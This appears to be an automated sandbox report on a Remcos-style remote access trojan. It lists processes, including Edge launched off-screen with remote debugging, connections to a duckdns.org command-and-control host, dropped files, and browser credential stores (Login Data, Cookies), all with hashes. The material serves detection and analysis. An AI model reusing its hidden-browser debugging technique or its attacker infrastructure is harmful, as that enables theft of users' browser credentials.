C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd5bca46f8,0x7ffd5bca4708,0x7ffd5bca4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,10160474216270204472,8337634107842243782,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,10160474216270204472,8337634107842243782,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,10160474216270204472,8337634107842243782,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2164,10160474216270204472,8337634107842243782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2164,10160474216270204472,8337634107842243782,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2164,10160474216270204472,8337634107842243782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2164,10160474216270204472,8337634107842243782,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 216.58.213.14:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
GB 216.58.213.14:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 dvlqrd8dhs.duckdns.org udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 26.69.169.192.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 dvlqrd8dhs.duckdns.org udp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 245.20.216.154.in-addr.arpa udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.180.10:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 142.250.180.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp

Files

memory/5116-4-0x00007FFD50683000-0x00007FFD50685000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1x0bxnv.bhi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5116-14-0x00000184F2B80000-0x00000184F2BA2000-memory.dmp

memory/5116-15-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

memory/5116-16-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

memory/5116-19-0x00007FFD50683000-0x00007FFD50685000-memory.dmp

memory/5116-20-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

memory/5116-23-0x00000184F2860000-0x00000184F2A7C000-memory.dmp

memory/5116-24-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

memory/224-25-0x0000000005080000-0x00000000050B6000-memory.dmp

memory/224-26-0x0000000005760000-0x0000000005D88000-memory.dmp

memory/224-27-0x0000000005650000-0x0000000005672000-memory.dmp

memory/224-28-0x00000000056F0000-0x0000000005756000-memory.dmp

memory/224-29-0x0000000005F00000-0x0000000005F66000-memory.dmp

memory/224-39-0x0000000005FF0000-0x0000000006344000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5f63331227ca7a936f3f8e00a55e23f7
SHA1 f2d862ac9f687bcc563b726cd5afbaa5b8e55bc2
SHA256 c5555b383f8537fc41c39ea131d78bdb80228d6842f161accb1c94c3ea0e841d
SHA512 f6ab7b6d6b9c73c75512e09aac7ffb4fb787805d42ee7ffd35344874020e18226f2c108e8cdeffefe32b725324f8bff336847eaa80405c732cf0c45a15cb0bd2

memory/224-41-0x0000000006620000-0x000000000663E000-memory.dmp

memory/224-42-0x0000000006670000-0x00000000066BC000-memory.dmp

memory/224-43-0x0000000007E70000-0x00000000084EA000-memory.dmp

memory/224-44-0x0000000006BE0000-0x0000000006BFA000-memory.dmp

memory/224-45-0x0000000007890000-0x0000000007926000-memory.dmp

memory/224-46-0x0000000007830000-0x0000000007852000-memory.dmp

memory/224-47-0x0000000008AA0000-0x0000000009044000-memory.dmp

C:\Users\Admin\AppData\Roaming\Nedrykke.Fon

MD5 a7622baff13af965a8174eb4e2d7feff
SHA1 35752f3ac7f996486d29ebf413cb2a5bbbf7f3dc
SHA256 5deb28e0bdc343244369ee358c45c79f3ff3c3b00b9d4e954638a7ce63a7c7e6
SHA512 ed19495f58dc68730e85ed711355dcbd84cbd600ef7a4b7028f17fde7cc40e6f06dce49f34dc6af4bd4dceb7b8fbb0c3ec652ca5b6011885ec5bd896fc9a5d86

memory/224-49-0x0000000009050000-0x000000000B958000-memory.dmp

memory/2720-63-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-66-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-70-0x0000000000E00000-0x0000000002054000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 a63e2d93981904158e97d4392da13092
SHA1 f30c0f6f8168cbd253cdbac213a81bcbb1ff68a4
SHA256 fc9e8f6789e14f5d691ac512f662b4a333c77f4090e9c77c47e7a8edfe794530
SHA512 e22e053cc8d7702b858b54cd831b97cd550ade0ca40a4977f3fbaeee66a9b7667c6875ad145ae69d857f031c8657cb2a1775adcfa531fb99f6f7a6b6ee7df44e

memory/2720-73-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-76-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-79-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-82-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-85-0x0000000000E00000-0x0000000002054000-memory.dmp

memory/2720-89-0x00000000049F0000-0x0000000004A24000-memory.dmp

memory/2720-93-0x00000000049F0000-0x0000000004A24000-memory.dmp

memory/2720-92-0x00000000049F0000-0x0000000004A24000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 e2b3b3c7de4015639c7c683561916015
SHA1 b8f4ba1082d26383550bb113548ea1b1b7a994df
SHA256 c428d0bb5ef47e36721e3f50583df6a073eb529821b111d7f67c15441f3d8c44
SHA512 8f7b69bb4d07390e983316778e9d5e73a81357529283dde023368eb2dccd97d7ec1e64dee8824fa1483f2333cdebe8afcf2c4c99db30055c699490d7c37da1e1

memory/2436-101-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1488-107-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3432-110-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3432-111-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2436-109-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 7061f68363b119d8accd2c9884ea13dd
SHA1 ec117c12c919f9d7affef53733861fe88b94231c
SHA256 8dfdb39cedc2bec85ee4f68cb630cb1cc3f4247c72811afc1d724aad9cd71a46
SHA512 5e0203974b9c41b44c4a5a64410059b1acf976078b914422741b2c5879c9993ee3368639ce0ea98099364001ef328ae5709338639ddd0ed97a25c025c1b0b113

\??\pipe\crashpad_3476_HZCLLGIMDYQLPKDU

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 41b0bd2703f2fbe7b1c502560dfa417b
SHA1 31c16919ee60f7637b0b177e20605ded90944681
SHA256 963984ee46a83e2a3048d78e0e7090e96922181f9eed59b2b02bf859df24b8c6
SHA512 49f3cce1e384e1206aaf82b3be3cd027f25aa7c8ba6699b509aa05536db3257abd1fc95e8a64f682049444296f12cbe2dd3ffea964f701c19532c4b7d6d6c80b

memory/1488-108-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2436-106-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3432-102-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2436-104-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1488-103-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Temp\locl

MD5 c3c5f2de99b7486f697634681e21bab0
SHA1 00f90d495c0b2b63fde6532e033fdd2ade25633d
SHA256 76296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582
SHA512 7c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8

memory/2720-221-0x0000000020FE0000-0x0000000020FF9000-memory.dmp

memory/2720-220-0x0000000020FE0000-0x0000000020FF9000-memory.dmp

memory/2720-217-0x0000000020FE0000-0x0000000020FF9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\9ca56fd4-6903-462c-a6fc-adc1ee19c316.tmp

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/2720-244-0x0000000000E00000-0x0000000002054000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 99d80831d2efc1aa072b7ed206763f81
SHA1 2eb9831258549efda43249190f88a75aef6051c0
SHA256 eafd8c0f569fa51b041bb07fdc98ec165f9234bfa2d529c0e57ae19775232f82
SHA512 97a2dd6cacf637d6e48f011f133f143899470fdea5a9fc9a1dd5505e2bd21b1ad45211654687127ab43b674d864568eb2b31ab89219e2e6b5ba7c21267d55645

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 d5a7481ebac721ce64ef33e6b65d8125
SHA1 946a983bd8bbb27f741ba3208aceab8c4ef6e704
SHA256 36bf7c4804f0b520bbc5d270a2bf1525ab9d29aa487d000d89840d63b6d6adbd
SHA512 04a78878ea23c01e9b2fc121c4597642a7bf546f7a5111a1baf77970c41bd61962ccdd6dd14e83970730bcc771207ae6ab119d8bfc5cb3afcd2f57a312df3bd7

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 b44856752f28ff31fb6138ed5e64bba5
SHA1 ed01cecfb5f1bc73badb34262b53d363ccac1d27
SHA256 77a4851070e75378956a448a26f40d947fa8a5b41cd0b0e3c177589b66c03380
SHA512 00a00380722977820e895794c9130b35599f5c625dfe5b8dd31a23c3545f8d40db16ce6f537103ea770fbdf546767d58c68fc7ba83ea297998d02a3b8f499488

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 d302342e3ba995ce60889529db666d17
SHA1 91bfdb989fbb23c72e4f003d559f78b057c549e2
SHA256 d3d7a9469b639d7c6703a2d933dbf0c477c47c40a2325349a4625bf9ba68453b
SHA512 59944dc648f14f41b53e0815283039bd076b51416656c955647fb3abc93435e71a7acbc5fdf357010097fbdd42cc0e95175a5ea2d88f86cfb91119efe1aaf49b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

MD5 986962efd2be05909f2aaded39b753a6
SHA1 657924eda5b9473c70cc359d06b6ca731f6a1170
SHA256 d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889
SHA512 e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

MD5 1f82a05c02bc2c0220bbf80010139289
SHA1 29d38b54d80141a3cc396b9bea1da352f404a839
SHA256 370878bd1ce103a1041b4d6ddb0d6f3dff910087fa04fc73d5b795459e70d196
SHA512 f67837b1376e1bc106d878d200b1a366b09c36a01e109e29920e54b0237ce05f0899f33948496194440bae51dcb068c3708a66e12c100b5546b0c0b3fb8b76f3

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 223a2e1df474539a08e077c2d11c2d84
SHA1 be86ca32e8aff342dd25e13f72e27d0772f28e52
SHA256 48a31a659f1a6897ca73d14c126be1eb734e9ff3f4ecf0fdd2da8aefdec768a0
SHA512 22d5a3e3a541ea37a2ee3de47ae2701485230f7b6daac8e48379458ffbef6d33fb852fa0dd92d0cb706f95a4e1a3a7b74f78ec875ea44c5ae908d159365f225b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

MD5 734c7e36b2c2ade7f70f22105908b17f
SHA1 4492db998e11c8c86d48d5109536b4e3f405484a
SHA256 680de1ba9e5db050ce6bdad83ae2a766a47c2750c7b4e956dbe39bb1c36fbff7
SHA512 a0795000393a16e0b2b8bb145a26b6e550e7c55f9e4acb82aff5f23e27414e43cb6c51970fbcaacb1bb104d6712f54d92522b0872375cc77f078dc7b86044a2f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

MD5 b40e1be3d7543b6678720c3aeaf3dec3
SHA1 7758593d371b07423ba7cb84f99ebe3416624f56
SHA256 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4
SHA512 fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

MD5 cf42a5d941985c56102442dd96aae2e2
SHA1 5b626013d0a6955e0c57fa0f77d68c53204ea362
SHA256 6c1b51c7cca611ccb0106e1bf5a9c2e2adf4dcedaf402238856f0592cf4032fc
SHA512 085d9122bc377fec300f63691f890114ffe94674840a393e6a98399299d41af6f92adbaa4be23cc9ff9aea071ca918c56fca1937850c197f564ec56188596675

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 f26dbd713a735bbe58608786d67e4eb7
SHA1 b8b6089fa4f021ca11b0adb347867125b0fa94e4
SHA256 ff75bc5625661d0180ada2a29ea6315b3ece381f35b34dce67bf1822981907a1
SHA512 774e35b00a2b90461b0734322035c629e86ae3ec52fabd688f80fe3bd2ef8879c3c116723bdae33d1e0e066ff12b922b431f18adf11d4b0de950753180ab319c

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

MD5 0bbb9e12acfa9e615888d1d78bb180f1
SHA1 420e6c484935db356b8a32001cbf9463c75e678a
SHA256 c2ccf5dadc3c05babac19d393f4d102020c3f350c0d5518888b407e9f4aa7c3f
SHA512 a8274d218508502432a011a6dcb49796d8d90f4562c77b0bf3f9623efe2be0a587b79dfb825c7042dbfa9fd2b5f734fdbb748a13ea7bc49971173643979d0c24

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 c0d61db4ccd9e616bcc3d7c947d50de1
SHA1 95d4d2b9522055d44fcf39ea20804a8f17b70782
SHA256 5e725668efb08426e5099fba969a94bf19ab0d830cb63c85d422e1f65da9799e
